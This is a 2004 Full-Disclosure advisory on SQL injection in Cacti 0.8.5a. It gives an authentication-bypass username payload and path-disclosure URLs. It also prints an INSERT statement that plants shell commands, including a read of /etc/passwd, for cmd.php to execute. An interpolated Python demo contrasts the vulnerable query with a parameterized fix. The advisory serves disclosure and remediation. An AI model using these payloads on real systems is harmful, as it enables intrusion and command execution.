[Full-Disclosure] SQL Injection in CACTI
From: Fernando Quintero (nandoudea.edu.co)
Date: Mon Aug 16 2004 - 15:03:41 CDT

/////////////////////////////////////////////////////
//// Vulnerable Program: CACTI
//// Version: The latest version, 0.8.5a
//// Url: http://www.raxnet.net
//// The Bug: SQL injection that allows bypassing the auth.
//// Date: Today, August 16 of 2004
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nandoudea.edu.co
//////////////////////////////////////////////////////

I. Affected software description:

Cacti is a complete frontend to RRDTool; it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG.

II. The Bugs

a) Full path disclosure

In several parts of the code, when anyone tries to open files in directories that do not appear at first, like include, lib, scripts, etc., an error appears that reveals the path where the program is installed. For example:

http://127.0.0.1/cacti/include/auth.php
http://127.0.0.1/cacti/auth_login.php?action=login
http://127.0.0.1/cacti2/auth_changepassword.php?ref=index.php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save

These are low risk bugs, but similarly they allow a possible attacker to obtain data about the remote system.

b) SQL injection and authentication bypass.

Injection of code is possible in the index.php file to bypass auth. When the username and the password are evaluated by auth_login.php, anyone can insert this:

username = admin' or '6'='6
password = password wished

Where 'admin' is a valid user in cacti, the system accepts this input and changes the password immediately.
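To make the effect of that input concrete, here is an added example that is not part of the advisory and not Cacti's own code. It reproduces, in Python, the shape of the string-built UPDATE that auth_login.php runs and contrasts it with a parameterized form. SQLite stands in for MySQL and a sha1 digest stands in for MySQL's PASSWORD() hash; both are assumptions, and the user_auth rows are constructed sample data.

```python
import hashlib
import sqlite3


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def legacy_hash(s: str) -> str:
    # Stand-in for MySQL's PASSWORD() used by the old Cacti schema (assumption:
    # any digest that differs from md5 is enough to reproduce the logic).
    return hashlib.sha1(s.encode()).hexdigest()


def fresh_db() -> sqlite3.Connection:
    """Constructed sample data: user_auth still holds PASSWORD()-style hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user_auth (username text primary key, password text)")
    conn.executemany(
        "insert into user_auth values (?, ?)",
        [("admin", legacy_hash("correct horse battery")),
         ("guest", legacy_hash("guest"))],
    )
    conn.commit()
    return conn


def vulnerable_migrate(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Same shape as the db_execute() call in auth_login.php: the submitted
    username and password are pasted into the SQL text. Returns rows updated.
    With username admin' or '6'='6 the WHERE clause becomes
    username='admin' or ('6'='6' and password='<hash>'), which is true for the
    admin row whatever password was submitted."""
    sql = ("update user_auth set password = '" + md5(password) + "'"
           " where username='" + username + "'"
           " and password = '" + legacy_hash(password) + "'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def safe_migrate(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Parameterized form: the driver binds the values, so quotes inside the
    input are data and cannot change the WHERE clause."""
    cur = conn.execute(
        "update user_auth set password = ? where username = ? and password = ?",
        (md5(password), username, legacy_hash(password)),
    )
    conn.commit()
    return cur.rowcount


def md5_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The post-migration login check (md5 compare), parameterized."""
    row = conn.execute(
        "select 1 from user_auth where username = ? and password = ?",
        (username, md5(password)),
    ).fetchone()
    return row is not None


def demo() -> dict:
    payload_user = "admin' or '6'='6"   # the input quoted in the advisory
    chosen_pw = "attacker-chosen"       # constructed value, never the real admin password

    vuln = fresh_db()
    vuln_rows = vulnerable_migrate(vuln, payload_user, chosen_pw)
    vuln_login = md5_login(vuln, "admin", chosen_pw)

    safe = fresh_db()
    safe_rows = safe_migrate(safe, payload_user, chosen_pw)
    safe_login = md5_login(safe, "admin", chosen_pw)
    legit_rows = safe_migrate(safe, "admin", "correct horse battery")

    return {"vuln_rows": vuln_rows, "vuln_login": vuln_login,
            "safe_rows": safe_rows, "safe_login": safe_login,
            "legit_rows": legit_rows}


if __name__ == "__main__":
    print(demo())
```

Running it shows the concatenated query rewriting the admin row (one row updated, login with the chosen password succeeds) while the parameterized query updates nothing for the same input and only succeeds when the real credentials are supplied. Escaping layers such as magic_quotes_gpc only mask this for inputs they happen to cover; binding parameters removes the problem regardless of php.ini.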
This is the code:

//auth_login.php
// line 33 ~
switch ($_REQUEST["action"]) {
  case 'login':
    /* --- UPDATE old password with new md5 password value */
    db_execute("update user_auth set password = '" . md5($_POST["password"]) . "' where username='" . $_POST["username"] . "' and password = PASSWORD('" . $_POST["password"] . "')");

So 'username' and 'password' can be injected. This would not be possible if the variable 'magic_quotes_gpc' were set to 'On' in the php.ini file of the system. Here is where Debian enters. I tested it in SID with the latest version of cacti. When it is installed, a configuration file called cacti.conf is created in the apache conf.d directory. This file contains the following information:

---BEGIN----
Alias /cacti /usr/share/cacti
Options +FollowSymLinks
AllowOverride None
order allow,deny
allow from all
AddType application/x-httpd-php .php
php_flag magic_quotes_gpc Off
php_flag short_open_tag On
php_flag register_globals On
php_flag register_argc_argv On
php_flag track_vars On
php_value include_path .
DirectoryIndex index.php
-----END----

magic_quotes_gpc is set to Off in the line:

php_flag magic_quotes_gpc Off

In this way everything that is needed to carry out a successful attack is available. Using this attack, I was able to inject some code into the table 'data_input_data_cache', and it allowed me to execute a command on the system with the permissions of the user who runs apache. A possible example of this is:

insert into data_input_data_cache (local_data_id, host_id, data_input_id, action, command, hostname, snmp_community, snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout, rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some script', '127.0.0.1', '', '1', '', '', '161', '500', 'hack', '/', '3', 'NULL', 'NULL', 'NULL');

Then point to http://127.0.0.1/cacti/cmd.php and the command will be executed.

III. SOLUTION:

The coders were contacted and the code was fixed in the cvs ;). The maintainer of cacti was contacted too.

IV. GREETINGS

- Greets all the community. I learn from you!
- Silence Team and the GIGAX Staff.

V. CONTACT

Fernando Quintero
nandoudea.edu.co
Silence Team

VI. FINAL WORDS

- Many applications would be vulnerable with the default configuration of Debian, check it!
- Sorry for the english, so !! Viva COLOMBIA !!

Fernando Quintero
Silence Team
Colombia - South America

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html